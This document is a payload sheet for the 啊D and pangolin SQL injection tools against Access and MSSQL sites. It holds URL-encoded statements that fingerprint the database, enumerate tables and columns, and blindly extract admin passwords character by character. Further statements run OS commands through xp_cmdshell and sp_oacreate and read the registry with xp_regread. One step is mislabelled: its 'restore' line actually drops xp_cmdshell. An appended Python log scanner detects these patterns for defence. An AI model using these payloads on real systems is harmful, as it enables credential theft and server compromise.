啊D tool statements for Access and MSSQL injection

SQL injection statements used by the 啊D injection tool

Dump user:
and char(124)+user+char(124)=0    (char(124) is the pipe character |, used to frame the value in the error message)
?Id=1659%20and%20char(124)%2Buser%2Bchar(124)=0

and 1=1: ?Id=1659%20%61%6E%64%20%31%3D%31

and 1=2: ?Id=1659%20%61%6E%64%20%31%3D%32

Check for SA privileges: And char(124)+Cast(IS_SRVROLEMEMBER(0x730079007300610064006D0069006E00) as varchar(1))+char(124)=1
(0x7300...6E00 is the UTF-16LE encoding of the string sysadmin)

Dump the current database: and char(124)+db_name()+char(124)=0 --

Check whether the database is MSSQL: and exists (select * from sysobjects)
URL-encoded: %20%20and%20exists%20(select%20*%20from%20sysobjects)

Determine the table name:
pangolin: ?Id=1659%20and%200%3C=(select%20count(*)%20from%20admin)%20and%201=1
  admin can also be URL-encoded: =%61%64%6D%69%6E

啊D: ?Id=1659%20and%20exists%20(select%20*%20from%20[admin])

Dump column names:
啊D: %20and%20exists%20(select%20[pwd]%20from%20[admin])

pangolin: %20and%200%3C=(select%20count(pwd)%20from%20admin)%20and%201=1
%20and%200%3C=(select%20count(id)%20from%20admin)%20and%201=1

Determine the record count:
  %20and%20(select%20%20len(cstr(count(*)))%20from%20admin%20where%201=1)=2%20and%201=1
This determines how many records the admin table holds. With 10 records, cstr(10) converts the count to the string "10", whose length is 2, hence the =2 here.

啊D: /Article.asp?Id=1659%20and%20(select%20Count(1)%20from%20[admin]%20where%201=1)%20between%200%20and%208
The tool narrows the count within 0-9999; this particular statement tests whether it lies between 0 and 8.

/Article.asp?Id=1659%20and%20(select%20%20abs(asc(mid(cstr(count(*)),2,1)))%20%20from%20admin%20where%201=1)=48%20and%201=1
The digit at position 2 of the record count (mid(..., 2, 1)) has ASCII code 48, i.e. '0'.
/Article.asp?Id=1659%20and%20(select%20%20abs(asc(mid(cstr(count(*)),1,1)))%20%20from%20admin%20where%201=1)=49%20and%201=1
The digit at position 1 (mid(..., 1, 1)) has ASCII code 49, i.e. '1'; the count is therefore 10.

Guess the field length:
Article.asp?Id=1659%20and%20(select%20top%201%20len(cstr(pwd))%20from%20(select%20top%201%20*%20from%20(select%20top%201%20*%20from%20admin%20where%201=1%20order%20by%201)%20t%20order%20by%201%20desc)t%20where%201=1)%3C=32%20and%201=1
Field length of the first record (the innermost top%201 selects the first record).
Article.asp?Id=1659%20and%20(select%20top%201%20len(cstr(pwd))%20from%20(select%20top%201%20*%20from%20(select%20top%202%20*%20from%20admin%20where%201=1%20order%20by%201)%20t%20order%20by%201%20desc)t%20where%201=1)%3C=32%20and%201=1
Field length of the second record (the innermost top%202 selects the first two records; the outer order by ... desc then yields the second one).

啊D:
Article.asp?Id=1659%20and%20(select%20top%201%20len([pwd])%20from%20(Select%20Top%201%20[pwd]%20from%20[admin]%20where%201=1%20order%20by%20[pwd])%20T%20Order%20by%20[pwd]%20desc)%20between%200%20and%2032
Tests whether the field length of the first record is between 0 and 32 (Top%201 selects the first record).
Article.asp?Id=1659%20and%20(select%20top%201%20len([pwd])%20from%20(Select%20Top%202%20[pwd]%20from%20[admin]%20where%201=1%20order%20by%20[pwd])%20T%20Order%20by%20[pwd]%20desc)%20between%200%20and%2032
Tests whether the field length of the second record is between 0 and 32 (Top%202 selects the second record).
Of the two inner top 1 clauses, keep one and change the other to top x to guess the length of the x-th record; alternatively change the last top (pangolin changes the last top to dump the length of the N-th record).

Guess the field content:
%20and%20(select%20top%201%20abs(asc(mid(cstr(pwd),1,1)))%20%20from%20(select%20top%201%20*%20from%20(select%20top%201%20*%20from%20admin%20where%201=1%20order%20by%201)%20t%20order%20by%201%20desc)t%20where%201=1)%3E32%20and%201=1
ASCII code of the first character of the first record.
%20and%20(select%20top%201%20abs(asc(mid(cstr(pwd),19,1)))%20%20from%20(select%20top%201%20*%20from%20(select%20top%201%20*%20from%20admin%20where%201=1%20order%20by%201)%20t%20order%20by%201%20desc)t%20where%201=1)%3E32%20and%201=1
ASCII code of the 19th character.

啊D:
/Article.asp?Id=1659%20and%20(select%20top%201%20asc(mid(cstr(pwd),7,1))%20from%20(Select%20Top%201%20[pwd]%20from%20[admin]%20where%201=1%20order%20by%20[pwd])%20T%20Order%20by%20[pwd]%20desc)%20%20between%2030%20and%2080
The ASCII code of the 7th character of the first record is between 30 and 80 (Top%201 selects the first record, Top%202 the second).
/Article.asp?Id=1659%20and%20(select%20top%201%20asc(mid(cstr(pwd),7,1))%20from%20(Select%20Top%202%20[pwd]%20from%20[admin]%20where%201=1%20order%20by%20[pwd])%20T%20Order%20by%20[pwd]%20desc)%20%20between%2030%20and%2080
The ASCII code of the 7th character of the second record is between 30 and 80.

Guess Chinese (double-byte) characters:
/Article.asp?Id=1659%20and%20(select%20%20abs(asc(mid(cstr(count(*)),2,1)))%20%20from%20admin%20where%201=1)%3C=256%20and%201=1
Whether the content of the first column is >= 256
/Article.asp?Id=1659%20and%20(select%20%20abs(asc(mid(cstr(count(*)),1,1)))%20%20from%20admin%20where%201=1)%3C=256%20and%201=1
Whether the content of the second column is >= 256
(On DBCS systems Access's asc() can return a negative value for a double-byte character, which is why the probes wrap it in abs().)

Check how many databases there are: And (Select char(124)+Cast(Count(1) as varchar(8000))+char(124) From [sysobjects] where xtype=char(85) and status >1)>0
(xtype=char(85) is xtype='U', i.e. user tables)

Dump the first database: And (Select Top 1 char(124)+name+char(124) From (Select Top 1 [id],[name] From [sysobjects] where xtype=char(85) and status >1 Order by [id],[name]) T Order by [id] desc,[name] desc)>0 --

Dump the N-th database: And (Select Top 1 char(124)+name+char(124) From (Select Top |N| [id],[name] From [sysobjects] where xtype=char(85) and status >1 Order by [id],[name]) T Order by [id] desc,[name] desc)>0 --

Dump how many column names there are: And (Select char(124)+Cast(Count(*) as varchar(8000))+char(124) From [库名]..[syscolumns] where (id = (SELECT TOP 1 id FROM [sysobjects] WHERE name = char(97)+char(116)+char(116)+char(97)+char(99)+char(104))))>0
(replace [库名] with the database name; char(97)+char(116)+char(116)+char(97)+char(99)+char(104) spells the table name attach)

Dump column names: And (Select Top 1 char(124)+name+char(124) From (Select Top 1 [name] From [syscolumns] where (id = (SELECT TOP 1 id FROM [sysobjects] WHERE name = char(97)+char(116)+char(116)+char(97)+char(99)+char(104))) Order by [name]) T Order by [name] desc)>0 --

Read the registry:
DROP TABLE D99_REG;CREATE TABLE D99_REG([ID] int,[Data][varchar](255))--

DECLARE @result varchar(255) EXEC master.dbo.xp_regread 'HKEY_LOCAL_MACHINE','SYSTEM\ControlSet001\Services\W3SVC\Parameters\Virtual Roots','/',@result output insert into D99_REG([ID],[data]) values('9999',@result);--

And (Select char(124)+Cast(Count(1) as varchar(8000))+char(124) From D99_REG)>0 --

Execute CMD:

DROP TABLE D99_CMD;CREATE TABLE D99_CMD([Data][varchar](1000),ID int NOT NULL IDENTITY (1,1)) insert D99_CMD exec master.dbo.xp_cmdshell 'dir c:\'--

And (Select char(124)+Cast(Data as varchar(4000))+char(124) From D99_CMD)>0--

Execute WSCRIPT:

DECLARE @s int EXEC sp_oacreate [wscript.shell], @s out EXEC sp_oamethod @s,[run], NULL, [cmd.exe /c dir c:\] --

Restore XP_CMDSHELL:

;exec master..sp_dropextendedproc 'xp_cmdshell'--
(Note that sp_dropextendedproc, as written here, removes the extended procedure rather than restoring it.)
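As an added, defender-side example that is not part of the original page: a small Python scanner that URL-decodes request targets taken from a web server access log and flags the signatures of the statements listed above (and 1=1/1=2 tautologies, sysobjects fingerprinting, the char(124) delimiter, len()/asc(mid()) blind probes, the nested top N record walk, and stacked extended-procedure calls). The sample request lines are constructed, and the regexes are heuristics chosen for this payload list, not a complete ruleset.

```python
import re
from urllib.parse import unquote

# Constructed sample request targets (hypothetical log entries, not from the original page).
SAMPLE_REQUESTS = [
    "/Article.asp?Id=1659",
    "/Article.asp?Id=1659%20%61%6E%64%20%31%3D%31",
    "/Article.asp?Id=1659%20and%20exists%20(select%20*%20from%20sysobjects)",
    "/Article.asp?Id=1659%20and%20(select%20top%201%20asc(mid(cstr(pwd),7,1))%20from%20"
    "(Select%20Top%201%20[pwd]%20from%20[admin]%20where%201=1%20order%20by%20[pwd])%20T"
    "%20Order%20by%20[pwd]%20desc)%20%20between%2030%20and%2080",
    "/Article.asp?Id=1659%20and%20(select%20top%201%20len([pwd])%20from%20(Select%20Top%202"
    "%20[pwd]%20from%20[admin]%20where%201=1%20order%20by%20[pwd])%20T%20Order%20by%20[pwd]"
    "%20desc)%20between%200%20and%2032",
    "/Article.asp?Id=1659;exec%20master..xp_cmdshell%20%27dir%20c:%5C%27--",
    "/Article.asp?Id=1659&page=2",
]

# One heuristic rule per technique in the payload list above. Each regex runs
# against the decoded, lower-cased, whitespace-collapsed request target.
RULES = [
    ("boolean-tautology", re.compile(r"\band\s+1\s*=\s*[12]\b")),
    ("mssql-fingerprint", re.compile(r"\bfrom\s+\[?sysobjects\]?")),
    ("pipe-delimited-error", re.compile(r"char\(124\)")),
    ("blind-char-probe", re.compile(r"\basc\(mid\(")),
    ("blind-length-probe", re.compile(r"\blen\((?:cstr\()?\[?\w+\]?\)")),
    ("top-n-record-walk", re.compile(r"\btop\s+\d+\b.*\border\s+by\b.*\bdesc\b")),
    ("stacked-extended-proc", re.compile(
        r"\b(?:xp_cmdshell|xp_regread|sp_oacreate|sp_oamethod|sp_dropextendedproc)\b")),
]

def normalize(target):
    """Decode twice (the tool double-encodes, e.g. %2B for '+'), then canonicalise."""
    decoded = unquote(unquote(target))
    return re.sub(r"\s+", " ", decoded).lower()

def classify(target):
    """Return the names of every technique matched in one request target, in RULES order."""
    text = normalize(target)
    return [name for name, rx in RULES if rx.search(text)]

def scan(requests):
    """Map each flagged request to its matched techniques; clean requests are omitted."""
    return {req: hits for req in requests if (hits := classify(req))}

if __name__ == "__main__":
    for req, hits in scan(SAMPLE_REQUESTS).items():
        print(", ".join(hits), "<-", normalize(req))
```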
Time: 2024-10-06 06:42:42
